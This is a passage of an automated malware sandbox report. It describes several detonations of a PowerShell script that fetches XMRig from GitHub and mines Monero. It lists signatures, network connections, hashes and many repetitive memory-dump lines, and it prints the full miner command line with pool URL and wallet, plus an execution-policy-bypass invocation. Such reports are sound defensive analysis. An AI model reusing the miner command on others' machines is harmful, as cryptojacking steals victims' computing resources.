memory/2424-94-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-95-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-96-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-97-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-98-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-99-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-100-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-101-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-102-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-103-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-104-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-105-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-106-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-107-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-108-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-109-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-110-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-111-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-112-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-113-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-114-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-115-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-116-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:47

Platform

win11-20240419-en

Max time kernel

1800s

Max time network

1755s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4512-0-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/4512-1-0x0000020F3CBC0000-0x0000020F3CBE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tqyffnzl.j0v.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4512-10-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/4512-11-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/4512-12-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/4512-14-0x0000020F3CED0000-0x0000020F3CEE2000-memory.dmp

memory/4512-15-0x0000020F3CEB0000-0x0000020F3CEBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3604-46-0x000001FF88C80000-0x000001FF88CA0000-memory.dmp

memory/3604-47-0x000001FF88DF0000-0x000001FF88E10000-memory.dmp

memory/3604-48-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/4512-49-0x00007FFE572F0000-0x00007FFE57DB2000-memory.dmp

memory/3604-51-0x000001FF88E10000-0x000001FF88E30000-memory.dmp

memory/4512-50-0x00007FFE572F3000-0x00007FFE572F5000-memory.dmp

memory/3604-52-0x000001FF88E30000-0x000001FF88E50000-memory.dmp

memory/3604-53-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-54-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-56-0x000001FF88E10000-0x000001FF88E30000-memory.dmp

memory/3604-55-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-57-0x000001FF88E30000-0x000001FF88E50000-memory.dmp

memory/3604-58-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-59-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-60-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-61-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-62-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-63-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-64-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-65-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-66-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-67-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-68-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-69-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-70-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-71-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-72-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-73-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-74-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-75-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-76-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-77-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-78-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-79-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-80-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-81-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-82-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-83-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-84-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-85-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-86-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-87-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-88-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-89-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-90-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-91-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-92-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-93-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-94-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-95-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-96-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-97-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-98-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-99-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-100-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-101-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-102-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-103-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-104-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-105-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-106-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-107-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-108-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-109-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-110-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-111-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-112-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-113-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-114-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-115-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

memory/3604-116-0x00007FF71F0C0000-0x00007FF71FCF3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:49

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4776-3-0x00007FFBD5FE3000-0x00007FFBD5FE4000-memory.dmp

memory/4776-5-0x00000194E7200000-0x00000194E7222000-memory.dmp

memory/4776-8-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp

memory/4776-9-0x00000194E73B0000-0x00000194E7426000-memory.dmp

memory/4776-10-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_23ayt3c5.uit.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4776-25-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp

memory/4776-61-0x00000194E7380000-0x00000194E738A000-memory.dmp

memory/4776-48-0x00000194E7390000-0x00000194E73A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/224-90-0x0000024278820000-0x0000024278840000-memory.dmp

memory/224-91-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/4776-93-0x00007FFBD5FE3000-0x00007FFBD5FE4000-memory.dmp

memory/224-92-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/4776-94-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp

memory/4776-95-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp

memory/4776-96-0x00007FFBD5FE0000-0x00007FFBD69CC000-memory.dmp

memory/224-97-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-98-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-99-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-100-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-101-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-102-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-103-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-104-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-105-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-106-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-107-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-108-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-109-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-110-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-111-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-112-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-113-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-114-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-115-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-116-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-117-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-118-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-119-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-120-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-121-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-122-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-123-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-124-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-125-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-126-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-127-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-128-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-129-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-130-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-131-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-132-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-133-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-134-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-135-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-136-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-137-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-138-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-139-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-140-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-141-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-142-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-143-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-144-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-145-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-146-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-147-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-148-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-149-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-150-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-151-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-152-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-153-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-154-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-155-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-156-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

memory/224-157-0x00007FF7A3C20000-0x00007FF7A4853000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

memory/1828-0-0x00007FFF0B583000-0x00007FFF0B585000-memory.dmp

